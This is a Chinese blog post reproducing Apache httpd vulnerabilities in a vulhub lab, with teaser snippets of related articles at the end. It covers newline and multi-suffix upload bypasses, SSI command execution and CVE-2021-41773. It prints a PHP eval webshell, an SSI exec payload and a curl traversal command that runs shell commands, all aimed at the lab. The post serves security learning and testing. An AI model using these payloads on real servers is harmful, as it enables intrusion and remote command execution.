Apache HTTPD漏洞复现

最新推荐文章于 2024-09-29 14:26:59 发布
最新推荐文章于 2024-09-29 14:26:59 发布
阅读量649 收藏 12
点赞数 18
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/couldt/article/details/139472611
版权

  • 一.Apache httpd漏洞复现 换行解析漏洞CVE-2017-15715

    漏洞描述

    Apache httpd是一款http服务器,他通过mod_php来运行PHP网页,其中2.4.0~2.4.29版本中存在的一个解析漏洞,在解析PHP时,text.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器策略。

    产生原因是$这个表达式,在正则表达式中,我们都知道$用来匹配字符串结尾位置。

    如果设置了RegExp 对象的 Multiline 属性,则$也匹配‘\n’或‘\r’。要匹配 $ 字符本身,请使用 $。

    使用vuihub靶场复现

    docker compose build

    docker compose up -d

    docker compose ps

    查看ip地址

    ifconfig

    访问:

    http://your-ip:8080

    接下来先尝试上传一个一句话木马<?php phpinfo();?>

    上传失败

    接下来burp抓包

    将包发到repeater模块

    点到16编码进制Hex位置

    70后的位置0d右击

    插入0a

    无回显无报错证明上传成功

    验证上传是否成功

    有回显说明后门可以正常使用

    如果想读取文件,或者上传下载将一句话木马写为

    <?php @eval($_POST[“shell”]);?>

    可以使用工具连接

  • 二.Apache HTTPD 多后缀解析漏洞

    漏洞概述:Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,不是必须是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

    首先上传一个.php为后缀的后门文件

  • 那就来利用一下apache httpd多后缀解析漏洞

访问文件位置,后门执行成功

利用AddHandler application/x-httpd-php .php这个配置文件,比如有一个文件含有多个后缀名但其中还有.php后缀即将被识别为php文件

三.Apache SSI远程命令执行漏洞

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令

访问靶机环境

写一个.shtml文件内容<!--#exec cmd="ls" --> 还可以执行其他命令

上传成功访问

四.Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773

漏洞复现启动环境

漏洞编号:CVE-2021-41773

在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

版本2.4.49

穿越的目录允许被访问(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

使用curl来发送命令载荷

curl -v --data "echo;id" 'http://192.168.153.177:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'  

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:(采用burp抓包,改包)

cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

漏洞复现记录笔记

Apache httpd漏洞复现
m0_56578216的博客
09-07 742
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。该漏洞Apache、php版本无关,属于用户配置不当造成的解析漏洞。在有多个后缀的情况下,只要一个文件含有。在解析PHP时, l.php\x0A 将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。来到httpd/apache_parsing_vulnerability靶场。来到httpd/apache_parsing_vulnerability靶场。后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。
ApacheApache HTTPD漏洞复现
m0_71944965的博客
09-12 1054
漏洞环境 该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/apache_parsing_vulnerability。进入该漏洞路径后执行以下命令: 漏洞复现 打开目标地址 http://192.168.119.131:80/,将一句话木马保存为 a.php.jpg,并上传到服务器。 访问一句话木马,并通过参数a传递命令。 命令执行成功漏洞环境 该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行以下命令: 查看上传文件
中间件漏洞复现Apache httpd(CVE-2017-15715)
2301_78533452的博客
09-12 244
Apache httpd 换行解析漏洞(CVE-2017-15715)Apache httpd是一款http服务器,其2.4.0~2.4.29版本中存在一个解析漏洞。在php解析时,将被按照PHP后缀进行解析,直接导致绕过某些安全策略。
apache解析漏洞
大方子
07-25 3460
复现环境 win2003(x64) phpstudy2016 Apache/2.4.23 PHP/5.4.45 复现过程 ①.先在文件根目录,建立123.php内容为123 PHP解析正常 ②.再创建一个456无后缀的文件,内容为456 无后缀,但是apache还是解析为PHP ③.创建一个789.php.3...
Apache学习笔记(详解,漏洞复现,基线检查)
最新发布
qq_66934029的博客
09-29 2348
Apache 2.4.0-2.4.29当中存在,在上述版本当中,Apache开启了正则表达式的多行属性,在匹配.php$文件时除了会匹配到的.php结尾的文件还会匹配到.php\0a结尾的文件,在业务环境中.php结尾的文件会交由PHP解释器执行,所以黑客可以上传.php\0a结尾对的文件来绕过上传限制,并且让文件中的内容按照PHP代码来执行。MaxKeepAliveRequests指令限制每个连接允许的请求数,打开KeepAlive时,如果将其设置为0, 则将允许无限制的请求。默认设置一般即符合要求。
Apache HTTPD 漏洞复现
来日可期的博客
09-07 2960
Apache HTTPD 多后缀解析漏洞Apache HTTPD 换行解析漏洞-CVE-2017-15715,Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773,Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013漏洞复现合集
Apache Optionsbleed 信息泄漏漏洞(CVE-2017-9798)
weixin_44047654的博客
01-10 2590
Apache Optionsbleed 信息泄漏漏洞(CVE-2017-9798)
[中间件漏洞]apache漏洞复现
紫洋的博客
05-25 1447
2.4.0~2.4.29版本中存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg中包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件,文件内容为phpinfo。
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1442
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
Apache漏洞复现CVE-2021-41773
m0_59151303的博客
08-06 291
漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)
Apache httpd-2.4.29-x86.zip
11-29
with OpenSSL 1.0.2m, brotli 1.0.1, nghttp 1.27.0, Zlib 1.2.10, PCRE 8.41, APR 1.6.3, APR-Util 1.6.1, IPv6 enabled
Apache中间件漏洞学习
E1even的博客
10-19 4056
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 原理: apache2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 复现: 首先这里查看index.php <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSI
Apache漏洞合集
2301_77315080的博客
10-19 528
shtml跟html类似,也是一种用于网页设计的标记型语言,区别在于:html是一种纯静态的标记型语言,在html文档里面写的内容是什么,用户打开浏览器看到的就是什么,而shtml是一种半静态半动态的标记型语言,在shtml里面可以包含SSI命令,当用户在浏览器浏览shtml文档的时候,里面包含的SSI命令会被解析,然后再呈现内容给用户。3.后缀名为.jpg,因为文件名inf.php.jpg中包含.php,所以解析为php文件,点的HEX值为2e,2e换成0a发送,0a是换行。4.访问页面解析成功。
Apache漏洞原理与复现
LJH1999ZN的博客
03-30 4116
一、Apache简介 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 二、Apache的历史漏洞 Apache路径穿越漏洞(CVE-2021-41773) Apache 路径穿越漏洞(CVE-2021-42013) Apache SSRF漏洞(CVE-
Apache HTTPD 换行解析漏洞(CVE-2017-15715)复现(vulhub)
qq_51398553的博客
06-18 530
可以看到,在该配置文件中,前三行的意思是将所有以.php为后缀的文件内容当作php文件进行解析,但使用$符对文件进行匹配。定位文件末的方法:在右边找到文件名,然后在左边对应的Hex值的后面有0d0a,0d是回车,0a是换行,在0d的前面插入0a。值得注意的是,当我用Tab键补全的时候,终端换行了,也可以说明文件名确实有换行符的存在。从源代码中可以看出,网站对文件的后缀名进行了过滤,将以php,php3,php4,php5,phtml以及pht为后缀的文件名放入黑名单。,拉取镜像,并查看服务相关信息。
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 漏洞复现
鸥鹭忘机
09-30 6165
前言 Apache2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单。 如果上传文件的php程序是设置的白名单,那么这个漏洞将无法利用。 漏洞环境 该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行一下命令: docker-compose up -d -d 表示后台运行。 注意:该命令必须在漏洞目录下执行,
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
weixin_50698958的博客
10-05 403
一、概述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 参考: https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 二、漏洞环境 路径:vulhub/httpd/CVE-2017-15715 启动环境:docker-compose up -d 访.
Apache2.4.23--解析漏洞
willow_liang的博客
10-21 5655
复现环境: Apache文件解析漏洞与用户的配置有密切关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性。Apache默认- -个文件可以有多个以点分隔的后缀,当右边的后缀无法识别,则继续向左识别,发现后缀是;php,交给php处理这个文件。 如下图中的shell.php.001。最后的001后缀无法识别,就向左进行识别,发现Php,就会解析成为php文件 漏洞修复: 在httpd.conf或httpd-vhosts.conf中加入以下语句,从而禁止文件名格式为*.php
Apache Log4j代码执行漏洞(CVE-2021-44228)
weixin_45808483的博客
12-14 8118
前言: 12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。 Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。 Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2
中间件漏洞合集:Apache HTTPD换行解析漏洞分析
"这篇文档是关于中间件漏洞的合集,涵盖了常见的Web中间件如IIS、Nginx和Apache,特别是重点讨论了Apache HTTPD的换行解析漏洞(CVE-2017-15715)。文档中提到了这个漏洞允许攻击者通过特殊构造的文件名绕过服务器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值